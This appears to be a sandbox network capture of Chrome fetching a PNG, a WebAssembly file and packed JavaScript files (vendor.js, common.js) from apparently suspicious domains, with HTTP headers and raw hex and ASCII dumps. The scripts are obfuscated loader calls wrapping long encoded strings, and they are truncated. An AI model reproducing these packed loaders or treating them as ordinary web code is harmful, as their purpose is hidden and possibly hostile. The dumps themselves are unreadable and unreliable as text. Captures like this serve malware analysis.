                                                                                                                                                          2024-06-09 22:41:10 UTC7800INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 43 08 06 00 00 00 da b4 86 e8 00 00 1e 3f 49 44 41 54 68 43 bd 9a 07 78 55 55 ba f7 7f bb 9d 7e 4e 0a e9 09 24 84 0e 21 44 8a 74 e9 06 14 41 45 1c b9 96 6b ef 3a 8a 33 28 2a df bd d7 ee e8 55 e7 3a a8 a0 63 bb 96 11 7b c7 91 2e 4a 11 91 1e 48 28 09 a4 f7 73 72 fa d9 7b af ef d9 27 e2 55 47 e6 c2 cc f7 7c eb 79 f2 ec b3 77 d6 7a d7 fb 7f fb bb f6 96 f8 27 47 c1 d8 db d3 2d 12 b5 9b 9e 6c 3f 15 52 83 c7 ce 4f df b7 e9 ed 53 5a f3 6b f4 a5 53 d9 f4 d7 e6 0e 98 70 d5 fd 98 66 d7 81 6f 5e fa c3 c9 d2 ea 5b 32 7d 72 46 66 de 65 9b d7 be 7a e5 c9 ae 39 d1 bc 7f 1a c0 e8 e9 17 b6 69 9a d6 b2 f1 f3 d7 07 9e 2c 33 65 13 17 2c f2 7a bd 8f 7e f5 d9 f2 7f 7a ff 7f 9a c0 bf df 7f 9b 90 24 89 7f bb f7
                                                                                                                                                          Data Ascii: PNGIHDR0C?IDAThCxUU~N$!DtAEk:3(*U:c{.JH(sr{'UG|ywz'G-l?ROSZkSpfo^[2}rFfez9i,3e,z~z$


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          353192.168.2.550137188.114.97.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC408OUTGET /mimlib.wasm HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          If-None-Match: W/"88346086e882b94f3127e009fea42084"
                                                                                                                                                          2024-06-09 22:41:10 UTC662INHTTP/1.1 304 Not Modified
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=40usbctAS8hUzWbaEeRrdVu%2FQ1xIZV8%2FwSwMrr1GQml7LCiTZ4B1t%2BRnXT%2FwAbwNEzdQw114Cy%2FlIQqzBEo9UTfzBbXdoWx%2FZs5XEul8YH8sE0IT53KGpdqIzmP084rJDsHB9L8Zrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0a9af1ce936-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          354192.168.2.55011790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC540OUTGET /pc/240516-03/static/js/vendor.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC645INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 151324
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:02:59 GMT
                                                                                                                                                          ETag: "6645cbc3-24f1c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE7[441],EU-GER-frankfurt-GLOBAL1-CACHE7[418,TCP_MISS,440],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6df441acaea58d49e016df9a029fc5ed
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1993406
                                                                                                                                                          X-CCDN-Expires: 598608
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15739INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 4c 67 54 67 44 59 42 64 41 47 67 47 38 41 69 41 61 67 43 59 61 6b 71 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 7a 63 79 49 4d 6d 67 43 55 31 64 6b 68 41 41 43 4a 4e 77 42 4f 76 48 6c 51 44 63 41 4e 79 67 4b 5a 43 67 4c 78 70 4d 56 41 43 4a 49 41 72 41 41 55 71 59 73 72 33 32 47 41 4c 41 51 43 4f 41 4c 79 75 59 41 68 41 41 59 78 71 68 5a 67 55 41 4f 6e 4d 79 4b 67 42 6c 52 56 34 30 41 48 4d 71 53 69 68 75 4e 6b 34 65 66 67 4e 75 43 51 55 51 62 6e 59 46 4e 42 6c 65 51 51 41 4c 58 69 51 79 64 49 42 66 63 72 46 79 30 4a 6f 41 59 51 42 5a 41 68 59 4f 4c 6a 34 42 49 52 46 78 53 57 6b 35 53 4a 55 4e 4c 52 30 37 59 7a 4e 4c 61 31 73 44 4b 68 52
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgTgDYBdAGgG8AiAagCYakqAuAMwFc0YAXAS3UzcyIMmgCU1dkhAACJNwBOvHlQDcANygKZCgLxpMVACJIArAAUqYsr32GALAQCOALyuYAhAAYxqhZgUAOnMyKgBlRV40AHMqSihuNk4efgNuCQUQbnYFNBleQQALXiQydIBfcrFy0JoAYQBZAhYOLj4BIRFxSWk5SJUNLR07YzNLa1sDKhR
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 55 47 4b 43 7a 35 70 55 77 67 66 65 41 2b 78 2f 42 65 67 6f 41 6d 67 47 71 7a 6d 30 53 44 7a 64 5a 55 6e 56 64 41 4d 73 57 34 41 6d 69 75 30 69 32 62 74 4e 6b 70 31 68 5a 67 77 77 69 45 47 56 4e 35 66 76 64 55 41 72 34 4d 41 57 71 30 61 6f 75 38 33 48 44 36 50 79 76 4e 52 38 45 34 7a 58 41 64 76 64 32 2f 54 4f 6f 78 67 44 30 49 43 43 79 6c 66 55 41 43 44 38 42 59 4d 78 41 67 2f 45 34 73 49 2b 77 41 30 39 76 79 61 67 76 47 67 38 71 79 52 64 44 6e 76 71 70 48 6d 4a 35 39 64 74 68 39 74 41 59 2b 36 71 4c 41 58 62 53 6a 55 2f 39 77 6a 32 70 69 42 6d 2f 43 6f 4e 53 67 31 38 65 5a 39 73 6c 62 54 6c 35 64 44 53 43 63 6c 47 37 67 30 37 35 34 39 50 49 41 65 4a 79 4b 47 71 79 58 35 51 67 46 6f 63 53 5a 4a 50 7a 5a 6c 71 47 47 76 39 43 41 53 75 35 4f 67 7a 66 2f 6d
                                                                                                                                                          Data Ascii: UGKCz5pUwgfeA+x/BegoAmgGqzm0SDzdZUnVdAMsW4Amiu0i2btNkp1hZgwwiEGVN5fvdUAr4MAWq0aou83HD6PyvNR8E4zXAdvd2/TOoxgD0ICCylfUACD8BYMxAg/E4sI+wA09vyagvGg8qyRdDnvqpHmJ59dth9tAY+6qLAXbSjU/9wj2piBm/CoNSg18eZ9slbTl5dDSCclG7g07549PIAeJyKGqyX5QgFocSZJPzZlqGGv9CASu5Ogzf/m
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 41 6b 74 2f 5a 2f 70 31 55 67 76 46 34 45 33 38 58 36 46 32 42 63 71 59 51 6c 34 49 50 4b 58 58 49 44 30 4b 63 59 65 45 46 76 53 66 67 79 46 77 4a 64 6b 58 41 51 43 41 42 77 41 36 41 45 34 44 45 58 56 35 7a 70 65 43 58 78 35 30 35 44 34 56 33 49 47 43 44 73 45 6c 32 73 62 51 65 6c 63 41 44 79 43 37 61 4e 46 79 5a 44 47 67 70 43 6e 61 4d 35 73 70 6c 54 37 33 33 45 6a 49 4d 62 52 5a 64 57 49 49 47 43 5a 41 31 50 4e 58 69 71 58 77 41 4b 33 35 79 58 30 73 43 4d 4a 50 49 36 41 44 63 37 59 4b 52 34 4a 62 42 2f 4a 53 67 4a 62 44 75 58 45 41 4b 5a 58 58 51 58 49 46 36 41 39 43 70 4a 45 6c 64 31 6b 6b 63 46 6f 44 47 30 6b 63 42 41 41 75 41 67 73 42 44 41 65 58 52 34 4c 5a 66 69 41 4a 46 7a 4f 66 67 58 50 35 36 55 41 49 58 76 35 35 67 41 74 58 6b 63 42 47 44 47 67
                                                                                                                                                          Data Ascii: Akt/Z/p1UgvF4E38X6F2BcqYQl4IPKXXID0KcYeEFvSfgyFwJdkXAQCABwA6AE4DEXV5zpeCXx505D4V3IGCDsEl2sbQelcADyC7aNFyZDGgpCnaM5splT733EjIMbRZdWIIGCZA1PNXiqXwAK35yX0sCMJPI6ADc7YKR4JbB/JSgJbDuXEAKZXXQXIF6A9CpJEld1kkcFoDG0kcBAAuAgsBDAeXR4LZfiAJFzOfgXP56UAIXv55gAtXkcBGDGg
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 6d 43 69 52 57 31 79 6f 75 58 71 41 68 75 57 6c 79 35 75 58 6b 69 69 75 56 51 48 44 75 55 43 31 65 72 52 56 7a 53 50 77 64 6c 56 73 6c 6b 59 50 39 70 5a 4d 44 41 41 71 6d 5a 35 79 44 34 58 2f 53 50 30 4e 39 61 73 79 34 78 55 4f 55 73 78 55 37 37 56 50 53 65 32 41 62 48 4a 41 43 32 42 61 55 76 47 68 49 6f 43 78 57 30 6f 4e 47 58 66 79 37 42 58 4d 4b 71 55 55 76 43 76 39 6f 7a 73 31 44 6a 4d 4b 6e 68 69 6c 67 52 7a 42 63 38 33 43 43 4d 4b 6e 78 55 6d 77 66 4b 6c 76 79 2f 64 6d 4a 61 47 6f 52 43 67 43 48 6e 4e 4d 7a 66 69 5a 38 2f 39 42 56 59 41 4a 56 41 4b 6f 4a 58 52 4b 7a 61 7a 66 45 58 65 57 4a 4b 34 33 53 4f 67 77 34 55 70 79 71 44 42 72 55 6b 42 57 6c 32 4f 4d 62 33 44 52 32 58 6b 38 6b 42 56 6d 4b 76 4a 56 67 67 48 77 41 46 4b 34 55 41 74 42 59 70 56
                                                                                                                                                          Data Ascii: mCiRW1youXqAhuWly5uXkiiuVQHDuUC1erRVzSPwdlVslkYP9pZMDAAqmZ5yD4X/SP0N9asy4xUOUsxU77VPSe2AbHJAC2BaUvGhIoCxW0oNGXfy7BXMKqUUvCv9ozs1DjMKnhilgRzBc83CCMKnxUmwfKlvy/dmJaGoRCgCHnNMzfiZ8/9BVYAJVAKoJXRKzazfEXeWJK43SOgw4UpyqDBrUkBWl2OMb3DR2Xk8kBVmKvJVggHwAFK4UAtBYpV
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 74 41 65 76 64 76 32 74 39 6c 76 6e 74 6f 39 75 4f 31 35 69 4d 63 35 33 6e 4e 33 70 34 78 74 4c 4b 31 65 30 66 53 6a 63 4f 49 65 72 49 55 6f 52 69 63 50 74 57 37 2b 31 6f 52 75 31 55 34 52 76 76 4d 34 65 75 64 76 59 52 6f 39 78 4d 61 70 36 32 63 35 68 6e 31 41 65 6c 5a 55 6b 4e 69 44 31 7a 74 72 39 73 52 43 54 54 32 64 43 31 4e 58 66 74 70 44 76 70 71 39 39 55 34 52 2f 75 73 51 4e 6c 6d 74 77 52 61 51 6e 7a 63 2f 44 4e 36 46 35 6b 31 72 31 6e 2f 4d 4c 70 34 31 4f 45 64 68 79 6b 67 4e 73 52 74 33 56 4d 6a 73 38 67 55 31 4d 37 70 6e 68 50 4d 2b 6e 32 67 2f 78 30 72 4d 74 78 33 51 75 30 64 6f 6a 74 6f 46 6c 6a 4e 47 75 79 6a 7a 39 57 78 55 42 69 70 72 63 30 2b 49 4e 47 6d 37 6d 77 56 31 69 67 4f 6e 6c 74 52 76 53 74 54 6c 30 39 74 55 69 32 39 4e 4c 71 68 43
                                                                                                                                                          Data Ascii: tAevdv2t9lvnto9uO15iMc53nN3p4xtLK1e0fSjcOIerIUoRicPtW7+1oRu1U4RvvM4eudvYRo9xMap62c5hn1AelZUkNiD1ztr9sRCTT2dC1NXftpDvpq99U4R/usQNlmtwRaQnzc/DN6F5k1r1n/MLp41OEdhykgNsRt3VMjs8gU1M7pnhPM+n2g/x0rMtx3Qu0dojtoFljNGuyjz9WxUBiprc0+INGm7mwV1igOnltRvStTl09tUi29NLqhC
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 47 42 48 32 45 78 56 46 39 68 31 6b 7a 2f 59 4f 62 59 46 57 70 6a 6f 41 44 68 6d 70 62 42 69 73 33 75 35 53 46 2f 4a 47 6a 68 4e 2b 37 2b 51 4d 79 45 38 72 36 2b 32 48 61 79 52 6e 69 73 75 70 56 65 78 75 69 34 2b 4c 77 67 55 6a 41 72 6d 67 6c 41 6d 6d 78 53 57 41 78 42 37 54 68 2f 4b 4a 48 59 68 4a 52 30 41 49 57 63 4c 67 69 37 78 41 54 53 49 2b 7a 6c 41 4c 58 6f 5a 49 45 75 77 4e 79 45 6b 6b 79 38 5a 4f 53 42 50 4c 53 53 54 49 38 30 58 76 68 77 47 43 46 61 35 35 68 58 32 45 2f 41 6e 34 41 71 70 43 42 59 53 4c 37 6b 6f 42 67 51 4f 54 43 36 59 4b 63 75 67 76 42 78 41 45 78 30 4a 63 45 68 6e 4f 51 41 5a 6f 49 73 62 6a 47 73 63 68 4c 41 34 65 34 49 64 47 45 56 73 4d 72 68 30 76 49 44 76 74 56 77 73 54 43 70 49 62 65 41 68 78 61 36 47 74 50 41 72 37 51 62 4a
                                                                                                                                                          Data Ascii: GBH2ExVF9h1kz/YObYFWpjoADhmpbBis3u5SF/JGjhN+7+QMyE8r6+2HayRnisupVexui4+LwgUjArmglAmmxSWAxB7Th/KJHYhJR0AIWcLgi7xATSI+zlALXoZIEuwNyEkky8ZOSBPLSSTI80XvhwGCFa55hX2E/An4AqpCBYSL7koBgQOTC6YKcugvBxAEx0JcEhnOQAZoIsbjGschLA4e4IdGEVsMrh0vIDvtVwsTCpIbeAhxa6GtPAr7QbJ
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 42 67 2b 66 61 5a 48 4a 5a 68 4b 59 59 41 71 6d 42 48 38 41 43 5a 30 50 6c 6a 5a 71 61 52 39 58 6d 57 65 61 69 41 79 35 6c 31 4d 50 4e 35 33 51 6a 64 67 71 6e 75 44 6a 34 56 4a 48 6f 41 71 33 6e 4d 41 4f 74 35 72 4b 43 62 65 51 31 35 32 33 6d 51 67 45 45 41 75 33 6b 6e 4f 4b 64 35 68 33 6b 56 75 62 52 47 33 7a 6e 6e 65 62 45 77 4d 68 6b 55 4c 74 64 35 52 6e 67 6d 32 43 39 35 7a 4b 6c 65 31 4c 64 35 57 72 6b 50 65 57 4e 35 39 37 4b 72 35 4f 70 77 47 66 6a 54 6d 64 6a 51 50 37 6e 5a 79 53 4e 35 62 33 6b 34 2b 5a 6d 67 43 47 67 59 2b 59 44 77 35 6e 6d 4d 65 51 31 35 75 50 6c 76 6f 41 54 77 73 62 6d 79 2b 65 6a 71 63 53 37 53 75 52 6f 67 30 76 6b 4b 41 44 44 35 38 76 6d 39 68 49 72 35 64 30 70 6b 34 43 72 35 44 58 6b 77 2b 66 4a 59 6d 76 6b 36 53 53 4b 45 38
                                                                                                                                                          Data Ascii: Bg+faZHJZhKYYAqmBH8ACZ0PljZqaR9XmWeaiAy5l1MPN53QjdgqnuDj4VJHoAq3nMAOt5rKCbeQ1523mQgEEAu3knOKd5h3kVubRG3znnebEwMhkULtd5Rngm2C95zKle1Ld5WrkPeWN597Kr5OpwGfjTmdjQP7nZySN5b3k4+ZmgCGgY+YDw5nmMeQ15uPlvoATwsbmy+ejqcS7SuRog0vkKADD58vm9hIr5d0pk4Cr5DXkw+fJYmvk6SSKE8
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 69 49 72 4e 74 67 5a 57 34 62 4f 4d 7a 51 6e 4e 41 4a 6c 4f 42 67 69 7a 67 5a 77 41 49 63 69 7a 67 65 36 73 56 38 59 6e 49 2f 67 42 73 5a 6e 4d 71 49 38 44 6a 75 4f 69 44 64 43 4e 6a 74 56 57 30 34 37 67 38 6c 6b 63 6f 70 62 66 31 78 69 4f 30 36 65 44 79 67 4b 42 43 76 5a 49 42 41 47 72 67 32 34 49 54 74 35 50 42 34 37 5a 31 35 36 4f 32 77 34 6d 4a 79 78 77 48 33 4f 4b 37 75 78 76 7a 6e 31 48 51 57 58 51 69 51 34 41 39 74 49 53 33 79 36 41 39 74 4a 59 42 4a 39 48 6f 73 45 53 44 7a 4f 42 45 67 5a 4e 43 77 55 4f 6e 6f 6a 59 46 49 6a 46 33 5a 4b 57 71 34 37 57 64 77 64 36 72 45 2b 4f 44 74 4b 77 7a 48 61 6e 30 6b 47 75 36 44 4e 6a 46 35 5a 4e 53 35 6b 47 74 67 44 6b 43 4b 6c 70 55 2b 5a 78 42 43 4a 4a 57 6b 45 4f 54 6b 7a 4a 52 68 48 47 32 6f 67 4b 44 2b 78
                                                                                                                                                          Data Ascii: iIrNtgZW4bOMzQnNAJlOBgizgZwAIcizge6sV8YnI/gBsZnMqI8DjuOiDdCNjtVW047g8lkcopbf1xiO06eDygKBCvZIBAGrg24ITt5PB47Z156O2w4mJyxwH3OK7uxvzn1HQWXQiQ4A9tIS3y6A9tJYBJ9HosESDzOBEgZNCwUOnojYFIjF3ZKWq47Wdwd6rE+ODtKwzHan0kGu6DNjF5ZNS5kGtgDkCKlpU+ZxBCJJWkEOTkzJRhHG2ogKD+x
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 32 66 34 58 58 34 39 42 67 6c 67 42 46 6c 64 36 5a 6c 46 75 71 6b 59 57 6f 75 77 42 66 75 35 34 42 33 70 76 4b 67 56 7a 33 61 46 73 63 51 50 70 43 4b 63 4b 68 2b 37 33 62 51 38 77 4c 4e 61 57 37 74 31 42 32 55 54 69 68 37 38 42 6c 47 46 79 44 77 41 48 36 44 50 43 7a 31 43 44 74 7a 48 75 50 69 65 4c 31 41 35 54 50 65 38 48 41 39 68 5a 50 70 6b 7a 56 41 52 4f 4e 36 32 48 52 4a 30 54 42 66 41 35 65 2b 37 2f 44 4b 43 4e 37 42 2f 6b 44 71 43 49 68 4e 6b 32 31 36 43 47 55 63 68 67 69 67 44 58 77 4e 67 51 68 57 43 46 42 6a 39 67 6a 55 38 49 34 49 7a 67 69 75 43 4a 49 38 37 67 6a 68 66 73 39 55 50 67 67 53 38 35 2f 31 46 67 69 2b 54 43 45 49 52 51 6a 68 43 4d 49 4e 70 67 41 78 43 48 45 49 75 67 69 4a 43 48 73 4d 4b 51 69 78 41 51 6b 49 39 54 6f 35 43 49 62 47 4f
                                                                                                                                                          Data Ascii: 2f4XX49BglgBFld6ZlFuqkYWouwBfu54B3pvKgVz3aFscQPpCKcKh+73bQ8wLNaW7t1B2UTih78BlGFyDwAH6DPCz1CDtzHuPieL1A5TPe8HA9hZPpkzVARON62HRJ0TBfA5e+7/DKCN7B/kDqCIhNk216CGUchgigDXwNgQhWCFBj9gjU8I4IzgiuCJI87gjhfs9UPggS85/1Fgi+TCEIRQjhCMINpgAxCHEIugiJCHsMKQixAQkI9To5CIbGO
                                                                                                                                                          2024-06-09 22:41:11 UTC4513INData Raw: 7a 75 31 4a 44 6e 66 64 54 78 71 6c 79 31 75 68 6b 68 6b 32 50 55 37 6d 41 54 31 44 77 64 48 36 78 42 31 41 49 30 52 33 4e 57 77 77 76 55 55 4d 4f 61 36 66 48 62 43 4f 76 73 63 33 65 55 32 39 53 6d 31 46 66 78 34 54 41 48 31 4d 7a 55 78 65 34 68 52 32 66 55 75 4d 56 58 31 47 70 39 34 46 52 79 63 30 55 74 54 39 53 55 4e 4b 2f 55 37 39 54 55 4e 46 2f 55 6c 41 43 2f 31 47 45 41 2f 39 51 45 65 77 73 41 6d 74 53 67 4e 46 73 49 56 65 75 51 4e 50 7a 6e 37 61 69 4d 61 31 6d 41 38 44 54 4d 35 30 67 30 44 47 53 6f 4e 4a 4e 4e 57 44 53 71 4e 48 67 30 58 52 69 57 71 49 51 30 63 31 52 6b 76 57 4b 31 4b 31 51 55 4e 43 2f 55 6b 75 64 48 30 4b 47 62 39 44 52 6f 4e 49 75 73 7a 44 52 46 32 31 79 59 66 2b 69 37 52 62 66 55 76 44 54 72 5a 2b 6a 6b 47 75 64 73 35 7a 75 34 6f
                                                                                                                                                          Data Ascii: zu1JDnfdTxqly1uhkhk2PU7mAT1DwdH6xB1AI0R3NWwwvUUMOa6fHbCOvsc3eU29Sm1Ffx4TAH1MzUxe4hR2fUuMVX1Gp94FRyc0UtT9SUNK/U79TUNF/UlAC/1GEA/9QEewsAmtSgNFsIVeuQNPzn7aiMa1mA8DTM50g0DGSoNJNNWDSqNHg0XRiWqIQ0c1RkvWK1K1QUNC/UkudH0KGb9DRoNIuszDRF21yYf+i7RbfUvDTrZ+jkGuds5zu4o


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          355192.168.2.55011890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC540OUTGET /pc/240516-03/static/js/common.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC646INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 127284
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:42 GMT
                                                                                                                                                          ETag: "6645ca4a-1f134"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[2],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE14[569],EU-GER-frankfurt-GLOBAL1-CACHE7[377,TCP_MISS,563],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d97a877cc833547bc13788120ece0634
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1993405
                                                                                                                                                          X-CCDN-Expires: 598608
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15738INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 4a 67 47 5a 63 42 64 41 47 67 47 38 41 69 41 42 67 41 34 42 7a 41 5a 53 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 6c 35 6b 51 5a 4e 41 45 70 71 6e 4a 43 41 41 45 53 58 67 43 64 2b 66 4b 67 47 34 51 41 4f 69 67 42 65 43 69 42 34 6f 41 4a 69 41 37 63 2b 67 74 4d 4b 6d 39 64 58 48 67 4b 47 38 70 41 4e 79 68 4b 35 59 74 47 53 56 6c 2b 36 75 77 6f 53 70 67 67 75 6c 52 55 76 72 71 38 57 67 41 32 68 67 79 38 41 42 62 69 75 6a 54 71 61 41 41 38 53 68 6b 41 31 4c 6b 53 6d 50 7a 52 57 6a 42 4a 48 67 44 43 4a 69 41 41 67 72 79 59 6b 68 49 41 66 4c 71 34 41 47 52 74 2f 4a 6d 74 2b 41 44 73 41 50 77 67 75 53 56 6c 48 6e 55 4e 45 71 7a 38 54 66
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgGZcBdAGgG8AiABgA4BzAZSoC4AzAVzRgBcBLdJl5kQZNAEpqnJCAAESXgCd+fKgG4QAOigBeCiB4oAJiA7c+gtMKm9dXHgKG8pANyhK5YtGSVl+6uwoSpggulRUvrq8WgA2hgy8ABbiujTqaAA8ShkA1LkSmPzRWjBJHgDCJiAAgryYkhIAfLq4AGRt/Jmt+ADsAPwguSVlHnUNEqz8Tf
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 71 59 65 71 63 52 41 66 46 52 30 45 51 39 59 43 32 35 4a 67 58 4f 58 54 35 46 64 77 63 56 57 43 48 44 39 6b 72 32 49 46 64 48 5a 66 59 55 67 46 50 68 56 51 34 44 76 70 66 4d 76 72 41 62 4c 35 68 54 79 2b 73 32 67 48 51 4d 63 68 38 56 39 74 46 6c 65 71 62 4f 41 2b 30 6e 59 48 59 57 6d 6b 46 4d 79 44 73 50 46 55 74 36 33 33 73 79 45 51 37 77 6a 73 52 78 4d 47 4c 65 41 68 38 4b 6f 50 46 65 4c 57 38 7a 75 79 32 38 32 64 42 52 74 38 43 77 56 79 47 45 70 41 4b 6e 4f 6d 31 65 4e 4e 37 69 33 36 6b 51 76 48 51 39 44 74 66 34 4d 68 6d 69 4b 4f 39 70 41 59 78 66 52 4c 30 77 4d 65 4f 33 65 67 59 79 77 6f 68 76 59 67 63 47 44 45 46 44 6d 37 74 47 35 4d 4d 4b 38 46 7a 6b 34 58 47 66 50 30 68 52 4f 51 51 71 59 66 67 37 36 50 32 76 62 4b 72 4c 45 48 59 44 71 41 59 41 31
                                                                                                                                                          Data Ascii: qYeqcRAfFR0EQ9YC25JgXOXT5FdwcVWCHD9kr2IFdHZfYUgFPhVQ4DvpfMvrAbL5hTy+s2gHQMch8V9tFleqbOA+0nYHYWmkFMyDsPFUt633syEQ7wjsRxMGLeAh8KoPFeLW8zuy282dBRt8CwVyGEpAKnOm1eNN7i36kQvHQ9Dtf4MhmiKO9pAYxfRL0wMeO3egYywohvYgcGDEFDm7tG5MMK8Fzk4XGfP0hROQQqYfg76P2vbKrLEHYDqAYA1
